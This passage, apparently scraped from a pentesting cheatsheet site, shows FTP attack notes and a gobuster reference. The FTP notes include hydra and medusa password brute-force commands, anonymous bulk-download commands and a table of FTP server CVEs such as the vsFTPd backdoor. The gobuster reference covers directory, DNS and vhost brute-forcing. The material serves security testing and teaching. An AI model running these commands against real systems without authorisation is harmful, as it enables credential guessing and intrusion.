tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt ftp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt ftp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -u \u0026lt;user\u0026gt; -P wordlist.txt -h \u0026lt;ip\u0026gt; -M ftp\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"bulk-download\"\u003eBulk Download\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# wget recursive download (no passive mode)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewget -m --no-passive ftp://anonymous:anonymous@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# curl recursive\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous | awk \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;{print $NF}\u0026#39;\u003c/span\u003e | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003ewhile\u003c/span\u003e read f; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e curl -s ftp://\u0026lt;ip\u0026gt;/$f --user anonymous:anonymous -O; \u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSoftware\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eCVE\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003evsFTPd 2.3.4\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2011-2523\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBackdoor shell on port 6200\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eProFTPd 1.3.5\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2015-3306\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003emod_copy unauthenticated file copy\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eProFTPd 1.3.3c\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2010-4221\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRemote heap overflow\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e","title":"FTP"},{"content":"gobuster Cheatsheet Type: Multi-purpose brute-forcing tool — directories, files, DNS subdomains, virtual hosts, S3 buckets\nInstallation sudo apt install gobuster # or go install github.com/OJ/gobuster/v3@latest Modes Mode Description dir Directory and file brute forcing dns DNS subdomain brute forcing vhost Virtual host discovery fuzz Fuzzing (replace FUZZ keyword anywhere in URL) s3 AWS S3 bucket enumeration gcs Google Cloud Storage bucket enumeration Global Flags Flag Description -w \u0026lt;wordlist\u0026gt; Wordlist path -t \u0026lt;n\u0026gt; Threads (default: 10) -o \u0026lt;file\u0026gt; Output to file -q Quiet — only print results -v Verbose --no-error Suppress errors -z No progress bar --delay \u0026lt;ms\u0026gt; Delay between requests dir — Directory \u0026amp; File Brute Force # Basic scan gobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt # Common flags gobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -t 50 \\ # 50 threads -x php,html,txt,bak \\ # File extensions -s 200,204,301,302,307 \\ # Status codes to show -b 404,403 \\ # Status codes to exclude --timeout 10s \\ # Request timeout -k \\ # Skip TLS verification -c \u0026#34;PHPSESSID=abc123\u0026#34; \\ # Cookie -H \u0026#34;Authorization: Bearer tok\u0026#34; \\ # Custom header -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; \\ # HTTP Basic auth -r \\ # Follow redirects -e \\ # Print full URL -o results.txt # HTTPS target gobuster dir -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k # Custom User-Agent gobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -a \u0026#34;Mozilla/5.0\u0026#34; dir Flags Flag Description -u \u0026lt;url\u0026gt; Target URL -x \u0026lt;ext\u0026gt; File extensions (comma-separated) -s \u0026lt;codes\u0026gt; Allowed status codes -b \u0026lt;codes\u0026gt; Blacklisted status codes -r Follow redirects -k Skip TLS certificate verification -c \u0026lt;cookie\u0026gt; Cookie string -H \u0026lt;header\u0026gt; Extra header (repeatable) -U / -P HTTP Basic auth username/password -e Print full URL in output -l Print response length --timeout \u0026lt;dur\u0026gt; Request timeout --wildcard Force continue if wildcard found --exclude-length \u0026lt;n\u0026gt; Exclude responses of this length dns — Subdomain Brute Force # Basic DNS brute force gobuster dns -d \u0026lt;domain\u0026gt; -w wordlist.txt # With specific resolver gobuster dns -d example.com -w wordlist.txt -r 8.8.8.8 # Show IP addresses gobuster dns -d example.com -w wordlist.txt -i # Wildcard override gobuster dns -d example.com -w wordlist.txt --wildcard dns Flags Flag Description -d \u0026lt;domain\u0026gt; Target domain -r \u0026lt;resolver\u0026gt; Custom DNS resolver -i Show IP addresses of found subdomains --wildcard Force scan even if wildcard DNS detected vhost — Virtual Host Discovery # Basic vhost scan gobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt # Append domain to wordlist entries gobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ --append-domain \\ --domain example.com # Filter out specific response length (removes default/fallback page) gobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ --append-domain \\ --exclude-length 290 # HTTPS gobuster vhost -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k --append-domain vhost Flags Flag Description -u \u0026lt;url\u0026gt; Target URL --append-domain Append base domain to each word --domain \u0026lt;domain\u0026gt; Base domain to append --exclude-length \u0026lt;n\u0026gt; Exclude responses of this content length fuzz — Generic Fuzzing # Fuzz a parameter value gobuster fuzz -u \u0026#34;http://\u0026lt;ip\u0026gt;/page.php?id=FUZZ\u0026#34; -w wordlist.txt # Fuzz with status filter gobuster fuzz -u \u0026#34;http://\u0026lt;ip\u0026gt;/FUZZ.php\u0026#34; -w wordlist.txt -b 404 Recommended Wordlists # Directories /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # Files (with extensions) /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt # Virtual hosts / subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt Example Full Runs # Directory + file scan gobuster dir \\ -u http://example.com \\ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -x php,html,txt,bak,zip \\ -t 50 -e -l \\ -o gobuster_dir.txt # Virtual host discovery gobuster vhost \\ -u http://example.com \\ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ --append-domain \\ --exclude-length 290 \\ -t 50 \\ -o gobuster_vhost.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/gobuster/","summary":"\u003ch1 id=\"gobuster-cheatsheet\"\u003egobuster Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Multi-purpose brute-forcing tool — directories, files, DNS subdomains, virtual hosts, S3 buckets\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install gobuster\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/OJ/gobuster/v3@latest\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"modes\"\u003eModes\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eMode\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edir\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDirectory and file brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edns\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDNS subdomain brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003evhost\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVirtual host discovery\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003efuzz\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFuzzing (replace FUZZ keyword anywhere in URL)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003es3\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAWS S3 bucket enumeration\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003egcs\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGoogle Cloud Storage bucket enumeration\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"global-flags\"\u003eGlobal Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist path\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default: 10)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-q\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuiet — only print results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--no-error\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSuppress errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-z\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNo progress bar\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--delay \u0026lt;ms\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDelay between requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"dir--directory--file-brute-force\"\u003edir — Directory \u0026amp; File Brute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Common flags\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# 50 threads\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -x php,html,txt,bak \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# File extensions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -s 200,204,301,302,307 \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Status codes to show\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -b 404,403 \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Status codes to exclude\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --timeout 10s \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Request timeout\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -k \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Skip TLS verification\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -c \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;PHPSESSID=abc123\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Cookie\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Authorization: Bearer tok\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom header\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# HTTP Basic auth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -r \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Follow redirects\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Print full URL\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -o results.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom User-Agent\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -a \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dir-flags\"\u003edir Flags\u003c/h3\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;ext\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile extensions (comma-separated)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAllowed status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBlacklisted status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip TLS certificate verification\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c \u0026lt;cookie\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCookie string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;header\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExtra header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-U / -P\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth username/password\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-e\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint full URL in output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint response length\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--timeout \u0026lt;dur\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRequest timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wildcard\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce continue if wildcard found\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--exclude-length \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExclude responses of this length\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"dns--subdomain-brute-force\"\u003edns — Subdomain Brute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic DNS brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d \u0026lt;domain\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With specific resolver\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d example.com -w wordlist.txt -r 8.8.8.8\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Show IP addresses\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d example.com -w wordlist.txt -i\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Wildcard override\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d example.com -w wordlist.txt --wildcard\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dns-flags\"\u003edns Flags\u003c/h3\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r \u0026lt;resolver\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom DNS resolver\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow IP addresses of found subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wildcard\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce scan even if wildcard DNS detected\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"vhost--virtual-host-discovery\"\u003evhost — Virtual Host Discovery\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic vhost scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u http://\u0026lt;ip\u0026gt; -w 